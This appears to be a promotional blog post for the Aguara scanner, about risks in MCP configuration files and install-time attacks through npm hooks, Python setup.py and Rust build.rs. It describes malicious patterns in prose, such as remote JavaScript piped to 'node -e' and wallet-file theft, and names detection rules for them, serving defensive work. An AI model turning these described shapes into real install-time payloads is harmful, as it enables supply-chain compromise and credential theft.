Why are MCP configuration files a security risk?

MCP configuration files often contain hardcoded API keys, unpinned npx server installations, Docker containers running with --privileged flag, and shell metacharacters in arguments. These files are typically stored in plaintext on developer machines and are rarely audited, making them one of the most dangerous files in a developer's environment.

How can I audit my MCP configuration for security issues?

Use Aguara's auto-discovery feature (aguara scan --auto) to automatically find and scan MCP configurations from 17 supported clients including Claude Desktop, Cursor, and Windsurf. Aguara checks for hardcoded secrets, unpinned installations, insecure Docker settings, and shell injection risks.

Install-Time Code Is the Attack Surface: JavaScript, Python, Rust

The code you audit is the code your application runs. The code that attacks you is increasingly the code your package manager runs first: npm lifecycle hooks, Python's setup.py, Rust's build.rs. All three execute at install or build time, before any test, before any review of behavior, often inside CI with credentials in the environment.

Same moment, three dialects

In JavaScript, the hook is declared in package.json and the payload hides in package code: obfuscator-shaped blobs, install-time daemonization, CI secret harvesting. Aguara's jsrisk analyzer has covered those shapes since the spring releases.

In Python, the classic move is a setup.py that fetches remote JavaScript and hands it to node -e: a cross-runtime hop that defeats single-ecosystem analysis. In Rust, build.rs runs arbitrary code at build time, and the observed malicious pattern reads wallet and keystore files, then ships them to a network sink.

Why co-presence rules were not enough

The first versions of these detections were co-presence rules: flag a file that contains both a fetch and an execution call. That shape is cheap and wrong in both directions. Plenty of legitimate build scripts download things and separately run things; and a payload can put ten lines between the two and dodge a regex window.

v0.22.0 replaced both with flow-sensitive single-pass analyzers. PY_IMPORTTIME_REMOTE_JS_001 fires only when the value produced by a remote fetch actually reaches the execution sink, tracked through assignments, up to two hops, with taint cleared on safe reassignment. RS_BUILD_WALLET_EXFIL_001 requires the wallet read to reach the network send. The variable in between no longer fools the rule, and the legitimate download-here-run-that-other-thing script no longer trips it.

The general principle

Install-time execution deserves a different trust bar than runtime code, because nobody watches it run and everybody gives it credentials. The practical posture: gate it where your package manager allows (pnpm v11 does this well), check lockfiles against advisories before install, and scan the install path itself for behavioral shapes. One command covers the three languages:

$ aguara scan .

CRITICAL  setup.py
  PY_IMPORTTIME_REMOTE_JS_001: remote fetch reaches node -e

Scan the install path, not just the code

aguara scan . covers package code in JavaScript, Python and Rust, before install runs it.

Get Aguara on GitHub Install options